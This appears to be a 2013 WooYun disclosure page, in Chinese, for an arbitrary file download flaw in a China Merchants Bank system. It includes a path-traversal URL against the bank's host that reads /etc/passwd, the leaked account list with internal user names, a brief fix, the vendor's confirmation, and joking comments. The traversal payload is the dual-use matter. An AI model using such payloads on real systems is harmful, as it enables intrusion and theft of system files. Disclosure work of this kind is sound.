招商银行某系统任意文件下载漏洞 | wooyun-2013-040001| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-040001

漏洞标题：招商银行某系统任意文件下载漏洞

漏洞作者：想要减肥的胖纸

提交时间：2013-10-17 08:12

修复时间：2013-12-01 08:13

公开时间：2013-12-01 08:13

漏洞类型：任意文件遍历/下载

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-10-17：细节已通知厂商并且等待厂商处理中
2013-10-21：厂商已经确认，细节仅向厂商公开
2013-10-31：细节向核心白帽子及相关领域专家公开
2013-11-10：细节向普通白帽子公开
2013-11-20：细节向实习白帽子公开
2013-12-01：细节向公众公开

简要描述：

可以读取到各种信息，可惜不是root权限。。。

详细说明：

可以download任意文件。。请联系开发商进行整改

漏洞证明：

root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:6:12::/var/adm/invscout:/usr/bin/ksh
snapp:*:200:13:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
ipsec:*:201:1::/etc/ipsec:/usr/bin/ksh
nuucp:*:7:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
pconsole:*:8:0::/var/adm/pconsole:/usr/bin/ksh
esaadmin:*:10:0::/var/esa:/usr/bin/ksh
sshd:*:202:201::/var/empty:/usr/bin/ksh
ucmdb:!:203:1:UCMDB_probe_user-20111213:/home/ucmdb:/usr/bin/ksh
qadmsom:!:0:0:SOMOwner-SOM-20111213-C22018:/home/qadmsom:/usr/bin/ksh
qdevsom:!:205:1:SOM Developer_user-20111213:/home/qdevsom:/usr/bin/ksh
atmpusr:!:206:1:-ATM前置用户-蔡承杰/074327-20090310-:/ibp/atmpusr:/usr/bin/ksh
db2inst1:*:207:204:-db2客户端实例用户-#-20090309-:/home/db2inst1:/usr/bin/ksh
trsdb:*:209:1::/trsdb:/usr/bin/ksh
trsuser:*:208:1::/home/trsuser:/usr/bin/ksh
itmuser:*:204:205::/tivoli:/usr/bin/ksh
operator:!:770:1:RS6K组日常维护账户-ALL-2013-06-17.18.40.43-C71084:/home/operator:/usr/bin/ksh
dbmonusr:*:760:760:DBA日常值班维护账户-ALL-2013-06-21.19.39.21-C70907:/home/dbmonusr:/usr/bin/ksh

url
http://search.cmbchina.com/cmb/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd

修复方案：

正则过滤../限制并限制访问文件类型

版权声明：转载请注明来源想要减肥的胖纸@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2013-10-21 22:20

厂商回复：

CNVD确认并复现所述情况，已经在17号上午转由CNCERT通报招行银行，招商银行反馈在17日下午已经着手处置。
rank 10

漏洞评价：

2013-10-17 09:28 | 黑云 ( 路人 | Rank:12 漏洞数:3 | 米有)

knock,knock，查水表
2013-10-17 09:31 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

要是可以download工资表就好了
2013-10-17 11:39 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名，可我没猜出密码。)

@xsser 能update才好嘛
2013-10-17 13:49 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远，还需要厂商和白帽...)

开门！政府送温暖~
2013-10-22 08:58 | woody ( 路人 | Rank:8 漏洞数:1 | 菜鸟一枚)

@xsser 同学在里面做码农年薪30

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-040001

漏洞标题：招商银行某系统任意文件下载漏洞

相关厂商：招商银行

漏洞作者：想要减肥的胖纸

提交时间：2013-10-17 08:12

修复时间：2013-12-01 08:13

公开时间：2013-12-01 08:13

漏洞类型：任意文件遍历/下载

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源想要减肥的胖纸@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-040001

漏洞标题：招商银行某系统任意文件下载漏洞

相关厂商：招商银行

漏洞作者： 想要减肥的胖纸

提交时间：2013-10-17 08:12

修复时间：2013-12-01 08:13

公开时间：2013-12-01 08:13

漏洞类型：任意文件遍历/下载

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-040001"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 想要减肥的胖纸@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：想要减肥的胖纸

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源想要减肥的胖纸@乌云